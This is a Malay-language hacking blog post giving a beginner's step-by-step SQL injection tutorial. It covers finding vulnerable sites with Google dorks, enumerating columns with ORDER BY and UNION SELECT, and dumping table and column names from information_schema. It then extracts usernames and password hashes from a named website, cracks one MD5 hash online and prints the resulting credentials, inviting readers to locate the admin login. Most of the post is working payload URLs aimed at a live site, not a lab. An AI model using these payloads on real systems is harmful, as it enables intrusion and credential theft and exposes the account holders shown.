Wednesday, 16 January 2013

Thursday, 6 September 2012

SQLi bagi newbie , senang dan ringkas


jom mula,
1.cari website yang vuln....gunakan google dork untuk cari site y vuln cth dork - inurl:preview.php?id=

2.letakkan ' di hujung link site tue.. cth :  http://www.wang-li.com/art.php?id=-260'

3.akan keluar error seperti ini :
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /data/home/hlu015028/htdocs/class/mysql.inc.php on line 162

4.sekarang , kita nak cari brpa column dlm site tue , gunakan arahan ini :
+order+by+1-- pada saat ini , error tk akn keluar . so kita teruskan
+order+by+2-- tk da error
+order+by+3-- tk da error
+order+by+4-- error keluar sprti error d atas atu dlm bntuk lain..tau2 la korng :)
cth:
http://www.wang-li.com/art.php?id=-260+order+by+1-- tak da error
http://www.wang-li.com/art.php?id=-260+order+by+2--  tak da error
http://www.wang-li.com/art.php?id=-260+order+by+3--  tak da error
http://www.wang-li.com/art.php?id=-260+order+by+4--  tak da error
http://www.wang-li.com/art.php?id=-260+order+by+5--  ada error

so,table ada 4 , y ada error tue tk ikt :)

5.cari vuln column , dgn mnggunakan arahan :
+union+select+1,2,3,4--
cth:
http://www.wang-li.com/art.php?id=-260+union+select+1,2,3,4--

akan keluar nombor . pilih mana2 nombor y keluar atau pilih nombor yang paling hitam/bal
contohnya keluar no 2,3 dan 4 . kita pilih no 2 .

6.cari column y vuln dgn menggantikan nombor 2 dgn version() :
cth:
http://www.wang-li.com/art.php?id=-260+union+select+1,version(),3,4--
akan keluar benda nie : 5.1.48-log , version 5 sllunya boleh buat SQLi

7.kita akan pergi ke database site tue dgn arahan :
group_concat(table_name) ,  +from+information_schema.tables+where+table_schema=database()--
cth: http://www.wang-li.com/art.php?id=-260+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

akan keluar seperi ini :ass_album,ass_article,ass_cat,ass_delarticle,ass_feedback,ass_member,ass_membertype,ass_picture,ass_placard,ass_stylemod,ass_user,client,maillist,member,position

cari perkataan admins,log in,users,user,asal ada kaitan dgn admins site tue laa :)))

dlm site ni kita ada jumpa "ass_user" .. so kita kena convert jadi  kod ASCII mngunakan ini : http://home.paulschou.net/tools/xlate/
letak "ass_user" kat "text" dan hit "DECODE" .. akan keluarlaa banyak kod dari kotak2 tue.
tp ingt , kita nak kod ASCII , so copy kod y dlm kotak " [ ASCII DEC / CHAR ] " tue, dan paste
kat notepad .

selepas tue, tambah koma kat tengah y ada jarak tue,ia akan jadi sprti ini :
97,115,115,95,117,115,101,114

8.kita nak masuk dlm column "ass_user" dgn mnggunakan arahan ini :
group_concat(column_name) , +from+information_schema.columns+where+table_name=char(X)--

"X" dlm kurungn hujung tue gantikan dgn kod ASCII td
cth: http://www.wang-li.com/art.php?id=-260+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=char(97,115,115,95,117,115,101,114)--

dan keluar la nie :id,name,pwd

9.skrg kita nak ambil Password dan Username . dgn arahan seperti ini :
group_concat(X,0x3a,Z,0x3c62723e) , +from+ass_user--
 X dan Z tue ikut dari apa y keluar : Cth :
http://www.wang-li.com/art.php?id=-260+union+select+1,group_concat(name,0x3a,pwd,0x3c62723e),3,4+from+ass_user--

keluar la benda nie :
susan:722002470b3591f80dfefb9eec44d372

10.password dyer nie  jenis MD5 . klu nk tau password dyer y sebnarnya
gunakan : http://www.md5decrypter.co.uk/

copy kod nie 722002470b3591f80dfefb9eec44d372 dn paste kat " MD5 Hashes: "
lepas tue..tulis la kembali captcha kat bwah skli tue..tunggu beberasa ketika dan keluar la
password sebenar kat box bawah tue .

so :
username : susan
password : 161216

Admin log in , pandai2 la korng cari :)))

klu ada apa2,salah ker,tk faham ker..
komen jer :)



credit to :
Apek Ths Midyencikavadoka (infexion Crews)
Cha Dae Woong Sunbae (Skidderboy Hacker)
Tok Kadi Melinium (CyberItCrew)
Noentry Phc (Phantom Crews)